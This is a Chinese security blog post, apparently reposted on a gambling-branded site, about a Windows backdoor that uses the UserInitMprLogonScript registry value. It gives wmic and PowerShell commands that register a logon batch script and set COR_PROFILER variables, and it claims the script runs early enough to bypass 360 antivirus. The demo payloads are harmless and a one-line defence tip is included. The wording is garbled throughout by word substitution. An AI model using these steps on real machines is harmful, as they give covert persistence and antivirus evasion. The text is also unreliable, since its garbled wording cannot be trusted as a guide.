Logon Scripts的后门完成思绪 | 申博官网
登录
  • 欢迎进入Sunbet!
  • 如果您觉得Sunbet对你有帮助,那么赶紧使用Ctrl+D 收藏Sunbet并分享出去吧
  • 您好,这里是Sunbet!

Logon Scripts的后门完成思绪

0x00 媒介

依旧是对后门应用要领做引见,本次引见的是运用Logon Scripts的要领。但是我在研讨过程当中发现了一个迥殊的用法,剧本优先于杀毒软件实行,能够或许绕过杀毒软件对敏感操纵的阻拦,本文将要详细引见这个技能。

0x01 简介

· Logon Scripts用法

· 绕过360对wmi挪用的阻拦

· 迥殊用法

0x02 Logon Scripts用法

思绪来自于Adam@Hexacorn,地点以下:

Beyond good ol’ Run key, Part 18

扼要引见Logon Scripts的用法

注册表途径:HKCREnvironment

建立字符串键值: UserInitMprLogonScript

键值设置为bat的绝对途径:c:test11.bat

以下图

Logon Scripts的后门完成思绪 Logon Scripts的后门完成思绪

bat内容以下:

start calc.exe

刊出,登录

实行剧本11.bat,弹出计算器

0x03 绕过360对经由过程wmi修正环境变量的阻拦

在之前的文章《Use CLR to maintain persistence》提到过运用wmic修正环境变量的要领

敕令以下:

wmic ENVIRONMENT create name="COR_ENABLE_PROFILING",username="%username%",VariableValue="1"

wmic ENVIRONMENT create name="COR_PROFILER",username="%username%",VariableValue="{11111111-1111-1111-1111-111111111111}"

但是,360会对WMI的操纵停止阻拦,以下图

Logon Scripts的后门完成思绪 Logon Scripts的后门完成思绪

实在经由过程WMI增加环境变量等价于在注册表HKCREnvironment新建键值

———————————————-

申博|网络安全巴士站【www.bus123.net】

申博|网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。。

———————————————-

所以对WMI的操纵能够经由过程写注册表的操纵停止替代

以上WMI敕令可替换为以下powershell代码:

New-ItemProperty "HKCU:Environment" COR_ENABLE_PROFILING -value "1" -propertyType string | Out-Null

New-ItemProperty "HKCU:Environment" COR_PROFILER -value "{11111111-1111-1111-1111-111111111111}" -propertyType string | Out-Null

0x04 迥殊用法

源于我的一个迥殊的设法主意

我在对该技能研讨的过程当中,产生了一个风趣的设法主意,Logon Scripts启动的递次是不是优先于其他顺序呢?

若是是的话,那末是不是也优先于杀毒软件呢?

上面最先我的测试:

1、cmd输出以下代码

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"

不出不测,被阻拦

2、设置Logon Scripts

11.bat代码以下:

wmic ENVIRONMENT create name="test",username="%username%",VariableValue="I run faster!"
reg query HKEY_CURRENT_USEREnvironment /V test
pause

3、启用Logon Scripts

注册表途径:HKCREnvironment

建立字符串键值: UserInitMprLogonScript

键值设置为bat的绝对途径:c:test11.bat

因为挪用WMI会被阻拦,能够经由过程powershell完成,代码以下:

New-ItemProperty "HKCU:Environment" UserInitMprLogonScript -value "c:test11.bat" -propertyType string | Out-Null

4、刊出,从新登录,测试

若是注册表HKCREnvironment胜利被写入键值test REG_SZ I run faster!,申明Logon Scripts优先于杀毒软件实行,绕过杀毒软件的限定

完全操纵以下图

Logon Scripts的后门完成思绪 Logon Scripts的后门完成思绪

测试胜利,考证我们的结论

0x05 进攻

监控注册表键值HKCREnvironmentUserInitMprLogonScript

0x06 小结

本文对Logon Scripts的用法停止了测试,而且引见了一个迥殊用法,Logon Scripts能够或许优先于杀毒软件实行,绕过杀毒软件对敏感操纵的阻拦。

站在进攻的角度,要对此保持警惕。

本文为 3gstudent 原创稿件,受权嘶吼独家宣布,如若转载,请说明原文地点: http://www.4hou.com/technology/7403.html


Sunbet|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明Logon Scripts的后门完成思绪
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址